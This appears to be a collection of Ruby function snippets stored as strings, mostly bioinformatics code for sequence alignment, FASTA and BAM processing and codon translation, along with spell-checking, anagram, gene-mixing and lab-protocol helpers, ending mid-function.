"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def checkLengths(inputStr,lengthStr)\n ops_by_row = Hash.new { |hash, key| hash[key] = [] } # will hold Y/N length ok data\n operations.each do |op| # group by row\n ops_by_row[\"#{op.get(:qc_row)}\"].push op\n end\n ops_by_row.each do |row, ops|\n data = show do\n title \"Row #{row.to_i + 1}: verify that each lane matches expected size\"\n note \"Look at the gel image, and match bands with the lengths listed on the side of the gel image.\"\n note \"For more accurate values, select each well under <b>analyze</b> -> <b>electropherogram</b> to see peaks for fragments found with labeled lengths.\"\n note \"Select No if there is no band or band does not match expected size,\n select N/A if expected length is N/A and there is a band.\"\n ops.each do |op|\n select [\"Yes\", \"No\",\"N/A\"], \n var: \"verify[#{op.get(:qc_row)}][#{op.get(:qc_column)}]\", \n label: \"Does gel lane in column #{op.get(:qc_column) + 1} match the expected length of #{op.input(lengthStr).val} bp?\"\n end \n end \n # associate Y/N answers for row - to plan or to sample?\n ops.each do |op|\n item_id = op.input(inputStr).item.id\n op.plan.associate \"qc_result_#{item_id}_row_#{op.get(:qc_row)}column_#{op.get(:qc_column)}\", data[\"verify[#{op.get(:qc_row)}][#{op.get(:qc_column)}]\".to_sym]\n op.input(inputStr).item.associate \"qc_result_#{item_id}_row_#{op.get(:qc_row)}column_#{op.get(:qc_column)}\", data[\"verify[#{op.get(:qc_row)}][#{op.get(:qc_column)}]\".to_sym]\n end\n end\n end",
"def corrections\n #For each word to be looked at\n $words.each do |word_array|\n #If the word is misspelled attempt corrections\n possible_matches = Array.new\n if word_array[1] == false\n #Sets word to the actual word, instead of array pair\n word = word_array[0]\n # Get lexicon searching vars\n first_char = word[0]\n len = word.length\n\n ##Find words with similar letters\n #Saves the length of the word for eaiser access\n size = word.length\n #Iterates over words with matching starting letter and length +- 1\n $lexicon[first_char][len].each do |word_compare|\n possible_matches << word_compare[0]\n end\n\n # only check shorter words if length is greater than 1\n if len > 1\n $lexicon[first_char][len-1].each do |word_compare|\n possible_matches << word_compare[0]\n end\n end\n\n $lexicon[first_char][len+1].each do |word_compare|\n possible_matches << word_compare[0]\n end\n\n #Iterate over the possible matches, taking the match with the highest percentage\n #Hash to hold similarity\n similarity = Hash.new(0.0)\n possible_matches.each do |word_to_compare|\n similarity[word_to_compare] = match_percentage word, word_to_compare\n end\n\n best_match = ''\n similarity.each do |match|\n if match[1] > similarity[best_match]\n best_match = match[0]\n end\n end\n $correction[word] = best_match\n end\n end\nend",
"def aligns(map: @map, cursor: @cursor, width: @width)\n return 0 unless exit_allowed?\n tmp_cursor = cursor.copy\n tmp_cursor.forward!()\n tmp_cursor.shift!(:left)\n left_square = map.square(cursor.map_pos)\n tmp_cursor.shift!(:right, width + 1)\n right_square = map.square(cursor.map_pos)\n alignments = 0\n alignments += 1 if left_square.edges[cursor.facing(:right)] == :wall\n alignments += 1 if right_square.edges[cursor.facing(:left)] == :wall\n return alignments\n end",
"def ensure_sequence_setup(table_pair, increment, left_offset, right_offset)\n table_options = options(table_pair[:left])\n if table_options[:adjust_sequences]\n rep_prefix = table_options[:rep_prefix]\n left_sequence_values = session.left.sequence_values rep_prefix, table_pair[:left]\n right_sequence_values = session.right.sequence_values rep_prefix, table_pair[:right]\n [:left, :right].each do |database|\n offset = database == :left ? left_offset : right_offset\n session.send(database).update_sequences \\\n rep_prefix, table_pair[database], increment, offset,\n left_sequence_values, right_sequence_values, table_options[:sequence_adjustment_buffer]\n end\n end\n end",
"def warp_aligned\n\n align = params[:align]\n append = params[:append]\n destmap = Map.find(params[:destmap])\n\n if destmap.status.nil? or destmap.status == :unloaded or destmap.status == :loading\n flash.now[:notice] = \"Sorry the destination map is not available to be aligned.\"\n redirect_to action: \"show\", id: params[:destmap]\n elsif align != \"other\"\n\n if params[:align_type] == \"original\"\n destmap.align_with_original(params[:srcmap], align, append )\n else\n destmap.align_with_warped(params[:srcmap], align, append )\n end\n flash.now[:notice] = \"Map aligned. You can now rectify it!\"\n redirect_to action: \"warp\", id: destmap.id\n else\n flash.now[:notice] = \"Sorry, only horizontal and vertical alignment are available at the moment.\"\n redirect_to action: \"align\", id: params[:srcmap]\n end\n end",
"def display_disorder_annotated_alignment\n thread_num = 65\n @display_array = Array.new\n @max_count = 0\n @contact_consensus_array = Array.new\n @seq_contact_count = Alignment.all(:alignment_name => Alignment.get(params[:id]).alignment_name).count\n longest_alignment = 0;\n alignment_array = []\n @alignment_name = Alignment.get(params[:id]).alignment_name\n Alignment.all(:alignment_name => Alignment.get(params[:id]).alignment_name, \n :order => [:align_order.asc]).each do |alignment|\n puts alignment.alignment_sequence.length\n if alignment.alignment_sequence.length > longest_alignment\n longest_alignment = alignment.alignment_sequence.length\n end\n alignment_array << alignment\n end\n for i in 0..longest_alignment+1\n @contact_consensus_array[i] = Array.new(@seq_contact_count, 0)\n end\n #@contact_consensus_array = Array.new(longest_alignment, Array.new(@seq_contact_count,0))\n puts @contact_consensus_array.length\n puts \"Into The Threads\"\n thread_array=[]\n thread_num.times do |i|\n thread_array[i] = Thread.new{\n while alignment_array.length > 0 do\n alignment = alignment_array.pop\n sequence= alignment.sequence\n display_hash = Hash.new\n alignment_color_array = Array.new \n cur_position = 0 \n orig_position = 0\n AlignmentPosition.all(:alignment_id => alignment.align_id, \n :order => [:alignment_position_id.asc]).each do |position|\n if position.position == cur_position\n amino_acid = sequence.a_asequences.first(:original_position=>orig_position) #AAsequence.first(:id => position.aasequence_id)\n unless amino_acid.nil?\n alignment_color_array[cur_position] = residue_color(amino_acid.disorder_consensus, 0)\n if @contact_consensus_array[cur_position][alignment.align_order].nil?\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n if amino_acid.disorder_consensus >= 0.5\n @contact_consensus_array[cur_position][alignment.align_order] = @contact_consensus_array[cur_position][alignment.align_order] + 1\n end\n else\n puts \"Amino Acid doesn't exits: #{sequence.abrev_name} | #{cur_position}:#{orig_position}\" \n alignment_color_array[cur_position] = residue_color(0, 0)\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n else\n while position.position > cur_position\n alignment_color_array[cur_position] = \"FFFFFF\"\n cur_position += 1\n end\n amino_acid = sequence.a_asequences.first(:original_position=>orig_position) #AAsequence.first(:id => position.aasequence_id)\n unless amino_acid.nil?\n alignment_color_array[cur_position] = residue_color(amino_acid.disorder_consensus, 0)\n if @contact_consensus_array[cur_position].nil?\n puts \"OH no \" + alignment.sequence.abrev_name\n end\n if @contact_consensus_array[cur_position][alignment.align_order].nil?\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n if amino_acid.disorder_consensus >= 0.5\n @contact_consensus_array[cur_position][alignment.align_order] = @contact_consensus_array[cur_position][alignment.align_order] + 1\n end\n else\n puts \"Amino Acid doesn't exits: #{sequence.abrev_name} | #{cur_position}:#{orig_position}\" \n alignment_color_array[cur_position] = residue_color(0, 0)\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n end\n cur_position += 1\n orig_position +=1\n end \n puts display_hash[\"name\"] = Sequence.first(:seq_id => alignment.seq_id).abrev_name \n display_hash[\"alignment\"] = alignment_color_array\n @display_array[alignment.align_order] = display_hash\n if @max_count < cur_position\n @max_count = cur_position\n end\n end\n }\n end\n thread_array.map{|t| t.join}\n\n @contact_consensus_array = @contact_consensus_array.map{|a| a.inject(0){|sum,item| sum + item}}\n @cur_position = 0\n @tick_counter = 0\n @alignment_tick_array = Array.new\n while @cur_position <= @max_count\n @cur_position += 1\n @tick_counter += 1\n if @tick_counter != 25\n @alignment_tick_array << \"FFFFFF\"\n else\n @alignment_tick_array << \"000000\"\n @tick_counter = 0\n end\n end\n @display_hash = Hash.new\n @display_hash[\"name\"] = \"\"\n @display_hash[\"alignment\"] = @alignment_tick_array \n @display_array << @display_hash\n if params[:aa_length].nil?\n @aa_length = 400\n else\n @aa_length = params[:aa_length].to_i\n end\n @ranges = (@max_count/@aa_length)\n\n end",
"def target_len; genomic.len; end",
"def match_percentage incorrect, possible\n #Creates character arrays for both words\n incorrect_array = incorrect.split(\"\")\n possible_array = possible.split(\"\")\n\n #Hashes to hold count of each char\n incorrect_hash = Hash.new(0)\n possible_hash = Hash.new(0)\n\n #Counts the characters in each word\n incorrect_array.each do |char|\n incorrect_hash[char] += 1\n end\n possible_array.each do |char|\n possible_hash[char] += 1\n end\n \n ##Compares the two hashes and returns similarity as a decimal\n #The overall percentage and total characters, used to calculate final percentage\n overall_percentage = 0.to_f\n total_chars = [incorrect_hash.keys.length, possible_hash.keys.length].max\n #Iterates over the hash for the possible correction\n possible_hash.each do |chars|\n #Sets char to the actual character\n char = chars[0]\n #Sets value_possible to count in possible hash\n value_possible = chars[1]\n #Sets value_incorrect to count in incorrect hash\n value_incorrect = incorrect_hash[char]\n\n #If neither value is zero calcluates similarity and adds to overall_percentage, otherwise its 0\n if value_possible != 0 && value_incorrect != 0\n min = [value_possible, value_incorrect].min\n max = [value_possible, value_incorrect].max\n overall_percentage += (min.to_f / max.to_f)\n end\n end\n #Calculates similarity percentage and returns\n overall_percentage /= total_chars\n\n return overall_percentage * $lexicon[possible[0]][possible.length][possible]\nend",
"def check_alignment_marker(marker_name:)\n alignment_marker_sample = Sample.find_by(name: marker_name)\n stripwell_type = ObjectType.find_by(name: 'Stripwell')\n \n # all stripwells\n stripwells = Collection.where(object_type_id: stripwell_type.id).where.not(location: 'deleted')\n # all stripwells where the sample is the marker \n marker_stripwells = stripwells.select { |s| s.part(0,0)&.sample_id == alignment_marker_sample.id }\n # all stripwells where the location is fragment analyzer \n markers_in_analyzer = marker_stripwells.select { |s| s.location == \"Fragment Analyzer\" || s.location == \"Fragment analyzer\"}\n # check if the array of markers is > \n raise \"There can only be one Stripwell in the Fragment Analyzer\" if markers_in_analyzer.length > 1\n # all stripwells where the location is not fragment analyzer 1\n stripwell_replacement = marker_stripwells.reject { |s| s.location == \"Fragment Analyzer\" || s.location == \"Fragment analyzer\"}\n \n stripwell_replacement = stripwell_replacement.first\n marker_in_analyzer = markers_in_analyzer.first\n \n raise \"Stripwell - Fragment analyzer cannot be found\" if marker_in_analyzer.nil?\n \n marker_needs_replacing = marker_in_analyzer.get(:begin_date) ? (Date.today - (Date.parse marker_in_analyzer.get(:begin_date)) >= 7) : true\n marker_needs_replacing = marker_needs_replacing && (markers_in_analyzer.length == 0)\n \n if marker_needs_replacing && stripwell_replacement\n show do\n title \"Place stripwell #{stripwell_replacement} in buffer array\"\n note \"Move to the fragment analyzer.\"\n note \"Open ScreenGel software.\"\n check \"Click on the \\\"Load Position\\\" icon.\"\n check \"Open the sample door and retrieve the buffer tray.\"\n warning \"Be VERY careful while handling the buffer tray! Buffers can spill.\"\n check \"Discard the current alignment marker stripwell (labeled #{marker_in_analyzer}).\"\n check \"Place the alignment marker stripwell labeled #{stripwell_replacement} in the MARKER 1 position of the buffer array.\"\n image \"make_marker_placement\"\n check \"Place the buffer tray in the buffer tray holder\"\n image \"make_marker_tray_holder\"\n check \"Close the sample door.\"\n end\n \n stripwell_replacement.location = \"Fragment analyzer\"\n stripwell_replacement.associate :begin_date, Date.today.strftime\n stripwell_replacement.save\n release [stripwell_replacement]\n marker_in_analyzer.mark_as_deleted\n \n end\n end",
"def remove_inserts\n\n currseq = \"\"\n currname = \"\"\n # TODO: extract this from all methods to a helper class \n @content.each do |line|\n # if name anchor is found start a new bin\n if (line =~ /^>(.*)/)\n # check if we found next bin\n if (currseq.length > 0)\n # push name and sequence to containers\n @names << currname\n @seqs << currseq\n end\n # name is found next to anchor\n currname = $1\n # no sequence data yet\n currseq = \"\"\n else\n # append sequence data\n currseq += line\n end \n end \n # collect the data from the last bin\n if (currseq.length > 0)\n @names << currname\n @seqs << currseq\n end\n \n match_cols = []\n \n # Determine which columns have a gap in first sequence (match_cols = false)\n residues = @seqs[0].unpack(\"C*\")\n residues.each_index do |num|\n if (residues[num] == 45 || residues[num] == 46)\n match_cols[num] = false\n else\n match_cols[num] = true\n end\n end\n \n # Delete insert columns\n @names.each_index do |i|\n # Unpack C : 8-bit unsigned integer , push -> Array\n residues = @seqs[i].unpack(\"C*\")\n seq = \"\"\n # traverse over Integer Representation\n residues.each_index do |num|\n # If the base Sequence has no gap then check current sequence \n if (match_cols[num])\n if (residues[num] == 45 || residues[num] == 46)\n # Add gap to Sequence\n seq += \"-\"\n else\n # Add the Residue to Sequence\n seq += residues[num].chr\n end \n end \n end\n # Remove anchoring String Characters\n seq.tr!('^a-zA-Z-','')\n # Push an Upper Case representation to the @seqs array\n @seqs[i] = seq.upcase\n # Check whether all sequences have same length as parent\n if (@seqs[i].length != @seqs[0].length)\n logger.debug \"ERROR! Sequences in alignment do not all have equal length!\"\n end\n end\n end",
"def mixgenes( mgenes, sgenes ) ## returns babygenes\n ## note: reverse genes strings (in kai) so index 0 is the first number\n ## index 1 is the second number etc.\n mgenes = mgenes.reverse\n sgenes = sgenes.reverse\n\n babygenes = \"?\"*48 ## string with 48 question marks (?)\n\n # PARENT GENE SWAPPING\n 12.times do |i| # loop from 0 to 11 # for(i = 0; i < 12; i++)\n puts \"parent gene swapping i: #{i}\"\n index = 4*i # index = 4 * i\n 3.downto(1) do |j| ## loop from 3 to 1 # for (j = 3; j > 0; j--)\n puts \" j: #{j}\"\n if rand(100) < 25 # if random() < 0.25:\n mgenes[index+j-1], mgenes[index+j] = # swap(mGenes, index+j, index+j-1)\n mgenes[index+j], mgenes[index+j-1]\n end\n if rand(100) < 25 # if random() < 0.25:\n sgenes[index+j-1], sgenes[index+j] = # swap(sGenes, index+j, index+j-1)\n sgenes[index+j], sgenes[index+j-1]\n end\n end\n end\n\n # BABY GENES\n 48.times do |i| # loop from 0 to 47 # for (i = 0; i < 48; i++):\n puts \"baby genes i: #{i}\"\n mutation = nil # mutation = 0\n # # CHECK MUTATION\n if i % 4 == 0 # if i % 4 == 0:\n gene1 = Kai::NUMBER[ mgenes[i] ] # gene1 = mGene[i]\n gene2 = Kai::NUMBER[ sgenes[i] ] # gene2 = sGene[i]\n if gene1 > gene2 # if gene1 > gene2:\n gene1, gene2 = gene2, gene1 # gene1, gene2 = gene2, gene1\n end\n if (gene2 - gene1) == 1 && gene1.even? # if (gene2 - gene1) == 1 and iseven(gene1):\n probability = 25 # probability = 0.25\n if gene1 > 23 # if gene1 > 23:\n probability /= 2 # probability /= 2\n end\n if rand(100) < probability # if random() < probability:\n mutation = Kai::ALPHABET[ (gene1/2)+16 ] # mutation = (gene1 / 2) + 16\n end\n end\n end\n # GIVE BABY GENES\n if mutation # if mutation:\n babygenes[i]=mutation # baby[i] = mutation\n else # else:\n if rand(100) < 50 # if random() < 0.5:\n babygenes[i] = mgenes[i] # babyGenes[i] = mGene[i]\n else # else:\n babygenes[i] = sgenes[i] # babyGenes[i] = sGene[i]\n end\n end\n end\n\n babygenes.reverse # return bagygenes (reversed back)\nend",
"def overlaps(gses, gsms, verbose=false)\n overlap = 0\n nontrivial = 0\n ngses = gses.length\n # Computing the intersection is what takes time\n gses.each_with_index { |gse1, i|\n (i+1 ... ngses).each { |j|\n gse2 = gses[j]\n ind = gsms[gse1].intersectionIndicator( gsms[gse2], 2 )\n if ind > 0\n overlap += 1\n nontrivial += 1 if ind > 1\n print \"#{gse1} ^ #{gse2} = #{gsms[gse1].intersection( gsms[gse2] ).length}\\n\" if verbose\n end\n }\n }\n [overlap, nontrivial]\nend",
"def near_match\n (0..3).each do |guess_index|\n compare_for_near_match(guess_index)\n end\n end",
"def match(array_possible_anagrams)\n matching_words=[]\n word_broken=self.word.split(\"\").sort\n array_possible_anagrams.each do |possible_match|\n #possible_match=possible.word\n possible_match_broken=possible_match.split(\"\").sort\n if possible_match_broken == word_broken\n matching_words << possible_match\n else\n end #end of if\n end #end of do\n matching_words\n end",
"def find_alignment (alignment)\r\n total = 0\r\n weighted_alignment = alignment.each do |alignment|\r\n alignment.weight = alignment.weight + total\r\n total = alignment.weight\r\n alignment\r\n end\r\n percentage = rand(1..total)\r\n weighted_alignment.each do |alignment|\r\n return alignment.name if percentage <= alignment.weight\r\n end\r\nend",
"def build_lcs_length_table(str1, str2)\n p str1\n p str2\n lcs_length_table = []\n directional_table = nil\n #in both of the table the the first dimansion representing str2 and the second demansion representing str1\n (0..str2.size).each do |i|\n lcs_length_table[i] = [0]\n end\n \n (0..str1.size).each do |j|\n lcs_length_table[0][j] = 0\n end\n \n directional_table = deep_copy(lcs_length_table)\n\n (1..str2.size).each do |j|\n (1..str1.size).each do |i|\n devired_val = [ lcs_length_table[ j - 1 ][i], lcs_length_table[ j][ i -1 ]].max\n #determind the direction of the devired_val\n if lcs_length_table[ j - 1 ][i] == devired_val #prefre go up first when the two values are the same\n devired_from = \"^\"\n else\n devired_from = \"<\"\n end\n #puts \"#{\"\"<<str2[j - 1] } #{\"\"<<str1[i - 1]} #{j-1} #{i-1}\"\n if str2[j - 1] == str1[i - 1]\n lcs_length_table[j][i] = lcs_length_table[j-1][i-1] + 1\n directional_table[j][i] = \"=\"\n else\n lcs_length_table[j][i] = devired_val\n directional_table[j][i] = devired_from\n end\n end\n end\n\n\n lcs_length_table.each do |row|\n p row\n end\n\n directional_table.each do |row|\n p row\n end\n \n p get_common_sequence_from_directional_table(directional_table, str1.size, str2.size, str2)\n\n return lcs_length_table\nend",
"def amino_acid_2 (bases)\n bases_to_aa = []\n aa_list = []\n base1 = bases[0].to_list\n base2 = bases[1].to_list\n base3 = bases[2].to_list\n l1 = base1.size - 1\n l2 = base2.size - 1\n l3 = base3.size - 1\n (0..l1).each do |n1|\n b1 = base1[n1]\n (0..l2).each do |n2|\n b2 = base2[n2]\n (0..l3).each do |n3|\n b3 = base3[n3]\n bases_all = b1 + b2 + b3\n bases_to_aa << bases_all\n end\n end\n end\n\n bases_to_aa.each do |base|\n case base\n when /^TT[TCY]$/\n aa = \"F\"\n when /^TT[AGR]$/\n aa = \"L\"\n when /^CT.$/\n aa = \"L\"\n when /^AT[TCAHYWM]$/\n aa = \"I\"\n when \"ATG\"\n aa = \"M\"\n when /^GT.$/\n aa = \"V\"\n when /^TC.$/\n aa = \"S\"\n when /^CC.$/\n aa = \"P\"\n when /^AC.$/\n aa = \"T\"\n when /^GC.$/\n aa = \"A\"\n when /^TA[TCY]$/\n aa = \"Y\"\n when /^TA[AGR]$/\n aa = \"*\"\n when /^T[GR]A$/\n aa = \"*\"\n when /^CA[TCY]$/\n aa = \"H\"\n when /^CA[AGR]$/\n aa = \"Q\"\n when /^AA[TCY]$/\n aa = \"N\"\n when /^AA[AGR]$/\n aa = \"K\"\n when /^GA[TCY]$/\n aa = \"D\"\n when /^GA[AGR]$/\n aa = \"E\"\n when /^TG[TCY]$/\n aa = \"C\"\n when \"TGG\"\n aa = \"W\"\n when /^CG.$/\n aa = \"R\"\n when /^AG[TCY]$/\n aa = \"S\"\n when /^[AM]G[AGR]$/\n aa = \"R\"\n when /^GG.$/\n aa = \"G\"\n when /^[ATW][CGS][CTY]$/\n aa = \"S\"\n when /^[TCY]T[AGR]$/\n aa = \"L\"\n else\n aa = \"-\"\n end\n aa_list << aa\n end\n aa_out = aa_list.uniq.join\n return aa_out\n end",
"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] \n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def gen_random_seqs(msa_file,noalign_random_file)\n\n #read simple fasta file\n puts `pwd`\n\n\n len_align = 0;\n\n #create new OriginalAlignment\n oa = Bio::Alignment::OriginalAlignment.new()\n #load sequences from file\n Bio::FlatFile.open(Bio::FastaFormat, msa_file) { |ff|\n #store sequence from file\n ff.each_entry { |x| oa.add_seq(x.seq,x.entry_id) }\n }\n\n #remove gaps\n oa.remove_all_gaps!\n #determine ungaped length\n #oa.each_seq { |seq| len_align=[len_align,seq.length].max }\n #show it\n len_align = oa.alignment_length\n\n #store random sequence\n oa = oa.alignment_collect {|key| key = gen_rand_dna_seq(len_align) }\n\n #puts oa.output(:fasta)\n\n #puts result on disk\n simple_seqs_file = File.new(noalign_random_file,\"w\")\n simple_seqs_file.puts(oa.output_fasta)\n simple_seqs_file.close;\n \n end",
"def initialize(names, force_overwrite, ref, software,\n annotation, tophat_aligner, mismatches, err_rate)\n super(names, force_overwrite, ref, software)\n @annotation = annotation\n @tophat_aligner = tophat_aligner\n @mismatches = mismatches\n @err_rate = err_rate\n @mapped_bams = []\n @unmapped_bams = []\n @max_mismatches = 0\n end",
"def quasi_match?(text_base, max_mismatches)\n return true if max_mismatches >= patt_len\n\n # offset affects both the text and pattern.\n # Match checks are done by comparing\n # text[text_base+offset..text_base+len-1]\n # against\n # patt[offset..len-1]\n offset = 0\n\n # up to and including max_mismatches can be found\n (max_mismatches+1).times do\n mismatch_idx = next_mismatch(text_base, offset)\n return true unless mismatch_idx\n\n # If the mismatch was found at some index, further checks\n # need to happen from that index onward (not including the mismatch index)\n offset = mismatch_idx+1\n end\n\n false\n end",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def gags(options={})\n min_disagreeing_proportion = options[:min_disagreeing_proportion]\n min_disagreeing_proportion ||= 0.1\n min_disagreeing_absolute = options[:min_disagreeing_absolute]\n min_disagreeing_absolute ||= 3\n \n options[:acceptable_gag_errors] ||= DEFAULT_GAG_ERROR_CONTEXTS\n \n log = Bio::Log::LoggerPlus['bio-gag']\n \n piles = []\n gags = []\n \n each do |pile|\n options[:progressbar].inc unless options[:progressbar].nil?\n \n if piles.length < 2\n #log.debug \"Piles cache for this reference sequence less than length 2\"\n piles = [piles, pile].flatten\n next\n elsif piles.length < 3\n #log.debug \"Piles cache for this reference sequence becoming full\"\n piles = [piles, pile].flatten\n elsif piles[1].ref_name != pile.ref_name\n #log.debug \"Piles cache removed - moving to new contig\"\n piles = [pile]\n next\n else\n #log.debug \"Piles cache regular push through\"\n piles = [piles[1], piles[2], pile].flatten\n end\n log.debug \"Current piles now at #{piles[0].ref_name}, #{piles.collect{|pile| \"#{pile.pos}/#{pile.ref_base}\"}.join(', ')}\" if log.debug?\n \n # if not at the start/end of the contig\n first = piles[0]\n second = piles[1]\n third = piles[2]\n \n # Require particular sequences in the reference sequence\n ref_bases = \"#{first.ref_base.upcase}#{second.ref_base.upcase}#{third.ref_base.upcase}\"\n index = options[:acceptable_gag_errors].index(ref_bases)\n if index.nil?\n log.debug \"Sequence #{ref_bases} does not match whitelist, so not calling a gag\" if log.debug?\n next\n end\n gag_sequence = options[:acceptable_gag_errors][index]\n \n # all reads that have a single insertion after the first or second position, but not both \n inserting_reads = [first.reads, second.reads].flatten.uniq.select do |read|\n !(read.insertions[first.pos] and read.insertions[second.pos]) and\n (read.insertions[first.pos] or read.insertions[second.pos])\n end\n log.debug \"Inserting reads after filtering: #{inserting_reads.inspect}\" if log.debug?\n \n # ignore regions that aren't ever going to make it past the next filter\n if inserting_reads.length < min_disagreeing_absolute or inserting_reads.length.to_f/first.coverage < min_disagreeing_proportion\n log.debug \"Insufficient disagreement at step 1, so not calling a gag\" if log.debug?\n next\n end\n\n # what is the maximal base that is inserted and maximal number of directions\n direction_counts = {'+' => 0, '-' => 0}\n base_counts = {}\n inserting_reads.each do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n direction_counts[read.direction] += 1\n base_counts[insert] ||= 0\n base_counts[insert] += 1\n end\n log.debug \"Direction counts of insertions: #{direction_counts.inspect}\" if log.debug?\n log.debug \"Base counts of insertions: #{base_counts.inspect}\" if log.debug?\n max_direction = direction_counts['+']>direction_counts['-'] ? '+' : '-'\n max_base = base_counts.max do |a,b|\n a[1] <=> b[1]\n end[0]\n log.debug \"Picking max direction #{max_direction} and max base #{max_base}\" if log.debug?\n \n # Only accept positions that are inserting a single base\n if max_base.length > 1\n log.debug \"Maximal insertion is too long, so not calling a gag\" if log.debug?\n next\n end\n \n counted_inserts = inserting_reads.select do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n if read.direction == max_direction and insert == max_base\n # Remove reads that don't match the first and third bases like the consensus sequence\n read.sequence[read.sequence.length-1] == third.ref_base and\n read.sequence[read.sequence.length-3] == first.ref_base\n else\n false\n end\n end\n log.debug \"Reads counting after final filtering: #{counted_inserts.inspect}\" if log.debug?\n \n coverage = (first.coverage+second.coverage+third.coverage).to_f / 3.0\n coverage_percent = counted_inserts.length.to_f / coverage\n log.debug \"Final abundance calculations: max base #{max_base} (comparison base #{second.ref_base.upcase}) occurs #{counted_inserts.length} times compared to coverage #{coverage} (#{coverage_percent*10}%)\" if log.debug?\n if max_base != second.ref_base.upcase or # first and second bases must be the same \n counted_inserts.length < min_disagreeing_absolute or # require 3 bases in that maximal direction\n coverage_percent < min_disagreeing_proportion # at least 10% of reads with disagree with the consensus and agree with the gag\n log.debug \"Failed final abundance cutoffs, so not calling a gag\" if log.debug?\n next\n end\n \n # alright, gamut navigated. We have a match, record it\n gag = Bio::Gag.new(second.pos, piles, 